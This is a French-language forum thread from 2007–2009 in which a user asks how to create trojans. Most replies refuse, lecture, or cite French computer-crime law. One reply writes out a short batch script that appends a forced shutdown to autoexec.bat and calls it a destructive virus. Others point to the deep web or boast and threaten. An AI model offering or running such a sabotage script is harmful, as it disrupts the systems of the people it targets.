Rechercher : dans
Par :

Comment cree des trojan

deeluxe, le 28 oct 2007 à 19:05:34
 Signaler ce message aux modérateurs

Bonjour,
jaimerais savoire comment cree des trojan please

Configuration: Windows XP
Internet Explorer 7.0

Meilleures réponses pour « comment cree des trojan » dans :
Trojan, comment ça marche ? Voir Comment le pirate arrive t'il à vous espionner avec un Trojan ? Tout d'abord, je vous recommande vivement de bien lire l'article qui suit, merci de vous diriger vers ce lien =>Explication du...
Créer une adresse Hotmail.fr VoirPour créer un compte hotmail (@hotmail.fr), il suffit de créer un compte .NET passport en procédant à l'inscription via cette adresse Des informations personnelles vous concernant sont alors demandées par le service de messagerie de Microsoft. Il...
Création d'image Système (Ghost) VoirCréer une image (ghost) de partition 1 - Intérêt 2 - Pré-requis 2.1 - Explication 2.2 - Opportunités des partitions 2.3 - Mise à jour des images 2.3.1 - Image incrémentale : intéressant mais dangereux ! 2.3.2 - Image incrémentale et...
Télécharger LC ISO Creator VoirLC ISO Creator est très simple: Il permet de créer un fichier .ISO à partir de vos CD. Cela vous permet ensuite d'utiliser ces fichiers ISO pour les graver, utiliser un logiciel d'émulation de CD (pour ne plus avoir à utiliser le CD original) ou...
Créer un réseau local VoirPourquoi mettre en place un réseau local? Lorsque vous disposez de plusieurs ordinateurs, il peut être agréable de les connecter afin de créer un réseau local (en anglais LAN, abréviation de Local Area Network). La mise en place d'un tel réseau...
SQL - Création de table VoirLe SQL, comportant un langage de définition de données (LDD), permet de créer des tables. Pour cela, il utilise le couple de mots clés CREATE TABLE. La création de tables Le création de tables se fait à l'aide du couple de mots-clés CREATE...
PHP - Créer un moteur de recherche VoirIdée générale Le moteur de recherche ci-dessous ne correspond qu'à une idée possible de moteur de recherche simple, ne gérant qu'un seul mot clé. Le concept du fonctionnement de ce moteur est de créer une base de donnée contenant les mots clés de...

1

H4rDW4r3Z, le 28 oct 2007 à 19:06:49
  • +6

Tes intentions ne semblent pas très honnêtes...
Poste ce genre de problème ailleurs.

2

charlattan, le 28 oct 2007 à 19:09:47

Bonsoir H4 ....
Et tu crois qu'on va te répondre, ici sur CCM ?

Tu nous prends pour des "C..."

Personne ici n'a envie d'aller se rfaire une Santé

Passe ton chemin , et pose une question plus intelligente;.

Reconnaitre être "con", est un signe d'intelligence !

3

H4rDW4r3Z, le 28 oct 2007 à 19:11:54

Charlattan, apprend à (bien) lire avant de poster.
Regarde bien qui est à l'origine du thread. Merci!

4

charlattan, le 28 oct 2007 à 19:16:04

Bonsoir H4rDW4r3z

Pardon tu as raison, autant pour moi
je te présente toutes mes excuses.
Bonne soirée
Reconnaitre être "con", est un signe d'intelligence !

5

H4rDW4r3Z, le 28 oct 2007 à 19:17:35

Ca arrive à tout le monde.
Bonne continuation

28

lekilleur, le 7 aoû 2009 à 01:37:41

Salut ! Ca va!

6

mini hakeur, le 28 jan 2008 à 16:28:18

Page, doc et tutoriaux officiels va su ce site tu trouvera petere lé reponse pour cré un trojen

7

Elfragor, le 23 aoû 2008 à 21:01:12

Créer des trojans ne servent pas qu'au gens mal intentionné , si quelqun a besoin de relier ses deux ordinateur ou quelque chose dans ce genre , je pense que c'est legal .

8

TheTROLL, le 30 sep 2008 à 15:01:31

Lol j'aime bien le lien qui a été donné!

comment créé des page web en PHP!! j'adort! « don’t feed the troll » (ne nourrissez pas le troll)
Ne pollué pas le post des autres! créé vous votre propre pos­t, pour toutes questions! merci pour eux et pour nous!!

9

Oddfan321, le 1 oct 2008 à 12:48:49

écoute, je trouve cela vraiment con au plus au point de faire cela. je te le déconseille fortement carc'est illégal. Et quand tu auras un trojan sur ton ordi, tu ne diras plus la même chose... Alors fait pas ce truc. (les pirate, ce sont les gens qui sont con et qui veulent juste se la peter en disant: je sais pirater! franchement, je trouve cela DéBILE!!!!!) je dit pas que tu ai comme cela mais deviens pas un pirate et surtout ne les encourages pas!) VIVE LES ANTI-PIRATES!
les pirate, c des nazes!!!!!! (quand j'ai écris ces mots, j'était légerement énnervé mais, je n'en pense pas moins!!!!!!!!

18

GoThCraSh, le 9 mar 2009 à 16:32:34
  • +5

A ba le black hat (pirate), ouai!

Mais merci au Hacker White car grace a eux on avance beaucoup en ce qui concerne les sécurités informatiques

Attention un Hacker n'est pas forcément un pirate :)

http://fr.wikipedia.org/wiki/Hacker

Bonne continuation a vous

Ps: il peu être bon de savoir crée un trojan pour savoir comment ça marche, mais c'est claire qu'à des fins malicieuse c'est interdit et puni.

24

kalenwed, le 24 jui 2009 à 13:40:36

Tout le monde dit hacker mais les pirates sont des lamers Répétez : Je mettrai mon poste en résolu quand j'aurai eu la­ réponse à ma question et     j'écrirai mon message dans un ­langage que tout le monde comprenne 

10

torpille, le 21 oct 2008 à 10:33:44

Je suis daccor avec Oddfan321 car moi jme suis déja fais piraté une adresse msn et sa fais pas vrément plésir

11

J0eYkhadaFi, le 12 nov 2008 à 01:20:00

Les Pir@Te du net "les vrai" son en règle générale très intelligent on les S'appelle les élites.
ces vrai qu'il y a énormément de petit con qui se prenne pour des hacker lOol mai il passe leur vie sur le PC faut bien qu'il s'amuse les pauvres.

Bonne Soirée

12

jeremy, le 30 nov 2008 à 16:00:29

Pour créer un virus trojan il fo que tu ouvre un document texte et que tu ecrive:

@echo off
echo shutdown -s -f -t 0 >> C: \autoexec.bat
cls

mais fait attention mec ci t'a pas d'anti virus ne le fait pas car ces un vrai virus destructeur donc il fau que tu et un anti virus

13

TheTROLL, le 5 déc 2008 à 17:41:24

C'est du batch! ton truc très simple a mettre en pratique! « don’t feed the troll » (ne nourrissez pas le troll)
Ne pollué pas le post des autres! créé vous votre propre pos­t, pour toutes questions! merci pour eux et pour nous!!

14

jordan, le 9 déc 2008 à 19:38:13
  • +1

Bonsoir tout le monde.

Je voudrais tout d'abord rappeler que le monde est fait d'illégalitées d'ailleurs je suppose que vous n'etes pas tous des saints à ce sujet la car qui n'a jamais téléchargé une chanson sur le net pourtant cela n'a rien de légal hihi!!!

Il est sur que créer un cheval de troie comporte des risques réel, il est utilisé par des pirates (autant débutant que experts) qui s'en servent à de mauvaises fins donc soyons vigilant!!

Savoir créer un cheval de troie est une culture de plus comme les autres, mais en tant que bon informaticien je te conseillerais de faire attention à tes intentions.

On m'a souvent dis que connaitre les attaques permettait de mieux se defendre contre celles-ci. Mais il faut réfléchir aux conséquences à toi d'en juger par toi meme. N'oublie pas tout de meme que les lois sont faites pour etre respectées et à partir de la tu emploi ta responsabilitée.

Le net est fait de tout tu trouveras surement ta réponse ailleurs.

sur ceux bonne soirée.

15

TheTROLL, le 18 déc 2008 à 15:53:23
  • +8

Oui mais il peut les créé et juste les testé sur ses propre machine !!
c'est se que je fait que teste quelque petit programme sur une machine de teste prévu pour sa! « don’t feed the troll » (ne nourrissez pas le troll)

16

, le 28 déc 2008 à 23:51:53

Lol vous me faite rire la legalité et tout nan mais vous croyer que l'on vit dans un monde legal ou je reve ? matter les politiciens qui disent de ne pas faire ci ni ca, c'est eux les 1ers a le faires aucunes loi n'est réelment appliqué je suit desoler =/

20

OMS, le 24 mar 2009 à 18:49:01

Comant

17

TheOwner, le 16 fév 2009 à 02:30:59

Ahhh arreter donc de toujour être mécontant des questions non mais sérieux moi jétais hacker et pirateur avans et j'ai été comme lui a poser des questions idiote comme comment pirater un pc ou je veut faire une joke a mon ami et je veut pété son pc alors comme je peut mis prendre

et maitenant je suis un white hat et pour tas question de créer un trojan puije savoir c'est pour quels utiliter et je vais pouvoir taider et les hackers sont des personnes qui veulent toujour aller plus loin et ne les insulter pas avant davoir hacker le site de la police ou un compte bancaire et tous sa vous ne pouver même pas savoir la monter dadrénaline qui rentre dans votre corp just le fait davoir pirater un truc qui peut te faire prendre pour 10 ans de prison.

remember my name the next time you will see me you will be in a facking shit
rapeller vous de mon nom puisque la prochaine fois que vous allez me voir vous aller être dans une grosse merde

Hacker for life baby and just a white hat for now :P

19

TheTROLL, le 10 mar 2009 à 11:55:30
  • +3

TheOwner!

cela m'étonnerai que tu été Hacker et pirate avent !
car chose que tu doit sans doute pas savoir!
c'est quand ont est / a été Hacker ont en parle pas pas comme sa sur un forum!

un Hacker ou ancien Hacker se met pas en avent comme tu le fait!
car il connait les risque qu'il en court!!

même plusieurs années après les fait!

donc arrête de te prendre pour ce que tu n'es pas !
il y a déjà assez de troll comme sa sur les forums, c'est pas la peine dans rajouté 1 de plus!

et pour répondre a la question du post:
regarde sur le deep web tu trouvera se que tu cherche!

« don’t feed the troll » (ne nourrissez pas le troll)

25

Itcef, le 4 aoû 2009 à 12:18:09
  • +1

Vous étes cons, vous savez pas ce que c'est un vrai Hacker ^^
Arretez les conneries que les trojans sont illegal, on peux tester notre sécurité avec, sinon si c'est pour les petit pigeons bah abandonnez :)

26

sebsauvage, le 4 aoû 2009 à 13:16:29
  • +1

Arretez les conneries que les trojans sont illegal

Histoire d'arrêter les conneries, examinons la loi:

CODE PÉNAL, CHAPITRE III, Article 323-1:
"Le fait d'accéder ou de se maintenir, frauduleusement, dans tout ou partie d'un système de traitement automatisé de données est puni de deux ans d'emprisonnement et de 30000 euros d'amende."

Donc, à moins que ta compréhension du français soit très très altérée, les trojans sont bien illégaux.

27

gen-hackman, le 4 aoû 2009 à 13:24:31
  • +1

Salut sebsauvage...vu l'orthographe , je ne pense pas qu'il comprenne ce que tu dis ^^ ♦G3и-н@¢км@и™©®♦

29

DarkZ91, le 24 aoû 2009 à 04:19:37
  • +1

Ce n'est pas tout le temp illégal, car moi je m'en suis déjà servie pour aller sur le PC d'un pote lui faire un truc.

Si je peut resoudre se sujet, je connais Team Viewer, un logiciel d'accès a distance sur un autre PC.

Pour aller sur le PC du mec ou la meuf, tu doit avoir ses ID et son passe Team et ses bon.

DarkZ91

30

gen-hackman, le 24 aoû 2009 à 07:06:14

Euh quel rapport avec les trojans ? ♦G3и-н@¢км@и™©®♦

31

DarkZ91, le 24 aoû 2009 à 07:08:57
  • +1

Dans la logique, un trojan donne accès a un PC.

S'il voulait avoir accès a un PC et qu'il connaissait pas de logiciel, ya Team Viewer.

C'etait pour savoir s'il voulait un logiciel d'accès a distance.